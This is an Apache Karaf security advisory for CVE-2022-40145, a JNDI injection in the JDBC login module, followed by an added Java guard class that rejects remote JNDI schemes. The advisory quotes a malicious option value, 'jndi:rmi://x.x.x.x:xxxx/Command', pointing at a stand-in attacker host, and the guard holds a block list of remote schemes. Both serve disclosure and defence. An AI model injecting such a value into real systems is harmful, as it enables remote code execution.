A new security advisory has been released for Apache Karaf; the issue was fixed in the 4.3.8 and 4.4.2 releases.

CVE-2022-40145: LDAP injection vulnerability in JDBC Login Module with JDK 8

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected: all versions of Apache Karaf runtime prior to 4.3.8 and 4.4.2.

Description: This vulnerability concerns a potential code injection when an attacker has control of the target LDAP server used in the JDBC JNDI URL. The method jaas.modules.src.main.java.org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource uses InitialContext.lookup(jndiName) without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE, "jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI and an attacker has control of the target LDAP server.

This has been fixed in revision:
https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1

Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2 or later as soon as possible, or disable the JDBC login module.

JIRA Ticket: https://issues.apache.org/jira/browse/KARAF-7568

Credit: This issue was discovered and reported by Xun Bai <bbbbea...@gmail.com>
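The following is an added example (not Karaf's code and not the upstream fix referenced above) of the check a defender would place in front of the unfiltered InitialContext.lookup(jndiName) the advisory describes: the `datasource` option is accepted only when it resolves locally, and the `jndi:rmi://...` form quoted in the advisory is rejected before any lookup happens. The class name, the scheme list and the JDK 8 compatible style are assumptions.

```java
import java.util.Arrays;
import java.util.List;
import java.util.Locale;
import javax.naming.InitialContext;
import javax.naming.NamingException;

/** Guard for the JDBC login module's "datasource" option (added example, not Karaf code). */
public final class DataSourceNameGuard {

    private static final String OSGI_PREFIX = "osgi:";
    private static final String JNDI_PREFIX = "jndi:";

    // Assumed list: URL schemes that make InitialContext.lookup() contact a remote
    // naming server, which is what the advisory's "jndi:rmi://..." value relies on.
    private static final List<String> REMOTE_SCHEMES = Arrays.asList(
            "ldap:", "ldaps:", "rmi:", "iiop:", "iiopname:", "corbaname:", "dns:", "http:", "https:");

    /** Returns true only for names that resolve locally (OSGi service or plain JNDI name). */
    public static boolean isAllowed(String datasource) {
        if (datasource == null || datasource.trim().isEmpty()) {
            return false;
        }
        String name = datasource.trim();
        if (name.startsWith(OSGI_PREFIX)) {
            return true;               // resolved against the OSGi service registry, never the network
        }
        if (name.startsWith(JNDI_PREFIX)) {
            name = name.substring(JNDI_PREFIX.length()).trim();
        }
        String lower = name.toLowerCase(Locale.ROOT);
        for (String scheme : REMOTE_SCHEMES) {
            if (lower.startsWith(scheme)) {
                return false;          // would dereference a remote naming server
            }
        }
        return true;
    }

    /** Same JNDI lookup the login module performs, but only after the name passes the guard. */
    public static Object lookupJndi(String datasource) throws NamingException {
        if (!isAllowed(datasource)) {
            throw new NamingException("refusing remote data source name: " + datasource);
        }
        String name = datasource.trim();
        if (name.startsWith(JNDI_PREFIX)) {
            name = name.substring(JNDI_PREFIX.length()).trim();
        }
        return new InitialContext().lookup(name);
    }

    public static void main(String[] args) {
        // Constructed inputs: the benign and the malicious option values quoted in the advisory.
        for (String option : Arrays.asList("osgi:javax.sql.DataSource", "jndi:rmi://x.x.x.x:xxxx/Command")) {
            System.out.println(option + " -> " + (isAllowed(option) ? "allowed" : "rejected"));
        }
    }
}
```

Wiring this guard in is complementary to the advisory's mitigation, not a replacement for upgrading to 4.3.8 or 4.4.2.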